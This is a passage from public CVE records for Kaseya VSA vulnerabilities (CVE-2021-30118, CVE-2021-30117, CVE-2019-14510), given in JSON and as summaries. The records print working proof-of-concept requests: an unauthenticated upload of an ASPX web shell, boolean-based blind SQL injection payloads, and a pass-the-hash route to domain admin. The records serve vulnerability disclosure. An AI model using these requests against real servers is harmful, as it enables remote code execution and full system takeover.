              "name": "https://csirt.divd.nl/CVE-2021-30119",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/CVE-2021-30119"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "Upgrade to a version above 9.5.6"
          }
        ],
        "source": {
          "advisory": "DIVD-2021-00011",
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-30119",
    "datePublished": "2021-07-09T13:20:58",
    "dateReserved": "2021-04-02T00:00:00",
    "dateUpdated": "2024-08-03T22:24:59.199Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2021-30118 (GCVE-0-2021-30118)

Vulnerability from cvelistv5 – Published: 2021-07-09 13:19 – Updated: 2024-08-03 22:24
Summary
An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System.Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="System.IO" %> <%@ Import namespace="System" %> <%@ Import namespace="System.Data" %> <%@ Import namespace="System.Data.SqlClient" %> <%@ Import namespace="System.Security.AccessControl" %> <%@ Import namespace="System.Security.Principal" %> <%@ Import namespace="System.Collections.Generic" %> <%@ Import namespace="System.Collections" %> <script runat="server"> private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. 
Security issues discovered
---
* A sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication.
* /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access.
* The web server process has write access to the webroot, where the attacker can execute the file by requesting the URL of the newly created file.

Impact
---
This arbitrary file upload allows an attacker to place files of his own choosing in any location on the hard drive of the server that the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code), he can then execute this code in the context of the webserver to breach the integrity, confidentiality, or availability of the system, or to steal credentials of other users. In other words, this can lead to a full system compromise.
CWE
  • n/a
Assigner
Credits
Discovered by Wietse Boonstra of DIVD Additional research by Frank Breedijk of DIVD

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T22:24:59.357Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/CVE-2021-30118"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/DIVD-2021-00011"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Discovered by Wietse Boonstra of DIVD"
        },
        {
          "lang": "en",
          "value": "Additional research by Frank Breedijk of DIVD"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring \u0026 Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx\u0026PathData=C%3A%5CKaseya%5CWebPages%5C\u0026__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219\u0026qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 \u003c%@ Page Language=\"C#\" Debug=\"true\" validateRequest=\"false\" %\u003e \u003c%@ Import namespace=\"System.Web.UI.WebControls\" %\u003e \u003c%@ Import namespace=\"System.Diagnostics\" %\u003e \u003c%@ Import namespace=\"System.IO\" %\u003e \u003c%@ Import namespace=\"System\" %\u003e \u003c%@ Import namespace=\"System.Data\" %\u003e \u003c%@ Import namespace=\"System.Data.SqlClient\" %\u003e \u003c%@ Import namespace=\"System.Security.AccessControl\" %\u003e \u003c%@ Import namespace=\"System.Security.Principal\" %\u003e \u003c%@ Import namespace=\"System.Collections.Generic\" %\u003e \u003c%@ Import namespace=\"System.Collections\" %\u003e \u003cscript runat=\"server\"\u003e private const string password = \"pass\"; // The password ( pass ) private const string style = \"dark\"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); \u003csnip\u003e ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. 
Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-04-04T06:25:16",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/CVE-2021-30118"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://csirt.divd.nl/DIVD-2021-00011"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "SaaS version has been fixed by the vendor.\nUpgrade on-premise to version 9.5.6 or above"
        }
      ],
      "source": {
        "advisory": "DIVD-2021-00011",
        "discovery": "INTERNAL"
      },
      "title": "Unauthenticated Remote Code Execution in Kaseya VSA \u003c v9.5.5",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-30118",
          "STATE": "PUBLIC",
          "TITLE": "Unauthenticated Remote Code Execution in Kaseya VSA \u003c v9.5.5"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Discovered by Wietse Boonstra of DIVD"
          },
          {
            "lang": "eng",
            "value": "Additional research by Frank Breedijk of DIVD"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring \u0026 Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx\u0026PathData=C%3A%5CKaseya%5CWebPages%5C\u0026__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219\u0026qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 \u003c%@ Page Language=\"C#\" Debug=\"true\" validateRequest=\"false\" %\u003e \u003c%@ Import namespace=\"System.Web.UI.WebControls\" %\u003e \u003c%@ Import namespace=\"System.Diagnostics\" %\u003e \u003c%@ Import namespace=\"System.IO\" %\u003e \u003c%@ Import namespace=\"System\" %\u003e \u003c%@ Import namespace=\"System.Data\" %\u003e \u003c%@ Import namespace=\"System.Data.SqlClient\" %\u003e \u003c%@ Import namespace=\"System.Security.AccessControl\" %\u003e \u003c%@ Import namespace=\"System.Security.Principal\" %\u003e \u003c%@ Import namespace=\"System.Collections.Generic\" %\u003e \u003c%@ Import namespace=\"System.Collections\" %\u003e \u003cscript runat=\"server\"\u003e private const string password = \"pass\"; // The password ( pass ) private const string style = \"dark\"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); \u003csnip\u003e ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. 
Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
            },
            {
              "name": "https://csirt.divd.nl/CVE-2021-30118",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/CVE-2021-30118"
            },
            {
              "name": "https://csirt.divd.nl/DIVD-2021-00011",
              "refsource": "CONFIRM",
              "url": "https://csirt.divd.nl/DIVD-2021-00011"
            },
            {
              "name": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021",
              "refsource": "CONFIRM",
              "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "SaaS version has been fixed by the vendor.\nUpgrade on-premise to version 9.5.6 or above"
          }
        ],
        "source": {
          "advisory": "DIVD-2021-00011",
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-30118",
    "datePublished": "2021-07-09T13:19:42",
    "dateReserved": "2021-04-02T00:00:00",
    "dateUpdated": "2024-08-03T22:24:59.357Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2021-30117 (GCVE-0-2021-30117)

Vulnerability from cvelistv5 – Published: 2021-07-09 13:18 – Updated: 2024-08-03 22:24
Summary
The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 <!DOCTYPE html> <HTML> <HEAD> <title>Whoops.</title> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <link id="favIcon" rel="shortcut icon" href="/themes/default/images/favicon.ico?307447361"></link> ----SNIP---- ``` However when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed. 
Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 <html> <head> <title>Export Folder</title> <style> ------ SNIP ----- ```
CWE
  • n/a
Assigner
Credits
Discovered by Wietse Boonstra of DIVD Additional research by Frank Breedijk of DIVD

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T22:24:59.631Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Discovered by Wietse Boonstra of DIVD"
        },
        {
          "lang": "en",
          "value": "Additional research by Frank Breedijk of DIVD"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1\u2019 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 \u003c!DOCTYPE html\u003e \u003cHTML\u003e \u003cHEAD\u003e \u003ctitle\u003eWhoops.\u003c/title\u003e \u003cmeta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" /\u003e \u003clink id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"\u003e\u003c/link\u003e ----SNIP---- ``` However when fldrId is set to \u2018(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u2019 the request is allowed. 
Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 \u003chtml\u003e \u003chead\u003e \u003ctitle\u003eExport Folder\u003c/title\u003e \u003cstyle\u003e ------ SNIP ----- ```"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-04-04T06:25:15",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "SaaS version has been fixed by the vendor\n\nOnpremise\nUpgrade the server to version 9.5.6 or above\nUpgrade the agent to version 9.5.0.23 or above"
        }
      ],
      "source": {
        "advisory": "DIVD-2021-00011",
        "discovery": "INTERNAL"
      },
      "title": "Authenticated SQL injection in Kaseya VSA \u003c v9.5.6",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-30117",
          "STATE": "PUBLIC",
          "TITLE": "Authenticated SQL injection in Kaseya VSA \u003c v9.5.6"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Discovered by Wietse Boonstra of DIVD"
          },
          {
            "lang": "eng",
            "value": "Additional research by Frank Breedijk of DIVD"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1\u2019 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 \u003c!DOCTYPE html\u003e \u003cHTML\u003e \u003cHEAD\u003e \u003ctitle\u003eWhoops.\u003c/title\u003e \u003cmeta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" /\u003e \u003clink id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"\u003e\u003c/link\u003e ----SNIP---- ``` However when fldrId is set to \u2018(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u2019 the request is allowed. 
Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 \u003chtml\u003e \u003chead\u003e \u003ctitle\u003eExport Folder\u003c/title\u003e \u003cstyle\u003e ------ SNIP ----- ```"
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
              "refsource": "MISC",
              "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
            },
            {
              "name": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021",
              "refsource": "CONFIRM",
              "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
            }
          ]
        },
        "solution": [
          {
            "lang": "en",
            "value": "SaaS version has been fixed by the vendor\n\nOnpremise\nUpgrade the server to version 9.5.6 or above\nUpgrade the agent to version 9.5.0.23 or above"
          }
        ],
        "source": {
          "advisory": "DIVD-2021-00011",
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-30117",
    "datePublished": "2021-07-09T13:18:21",
    "dateReserved": "2021-04-02T00:00:00",
    "dateUpdated": "2024-08-03T22:24:59.631Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2019-14510 (GCVE-0-2019-14510)

Vulnerability from cvelistv5 – Published: 2019-10-11 11:44 – Updated: 2024-08-05 00:19
Summary
An issue was discovered in Kaseya VSA RMM through 9.5.0.22. When using the default configuration, the LAN Cache feature creates a local account FSAdminxxxxxxxxx (e.g., FSAdmin123456789) on the server that hosts the LAN Cache and all clients that are assigned to a LAN Cache. This account is placed into the local Administrators group of all clients assigned to the LAN Cache. When the assigned client is a Domain Controller, the FSAdminxxxxxxxxx account is created as a domain account and automatically added as a member of the domain BUILTIN\Administrators group. Using the well known Pass-the-Hash techniques, an attacker can use the same FSAdminxxxxxxxxx hash from any LAN Cache client and pass this to a Domain Controller, providing administrative rights to the attacker on any Domain Controller. (Local account Pass-the-Hash mitigations do not protect domain accounts.)
Severity ?
No CVSS data available.
CWE
  • n/a
Assigner

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T00:19:41.084Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.kaseya.com/products/vsa/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://community.kaseya.com/xsp/f/355.aspx"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://community.kaseya.com/xsp/f/355/t/24675.aspx"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
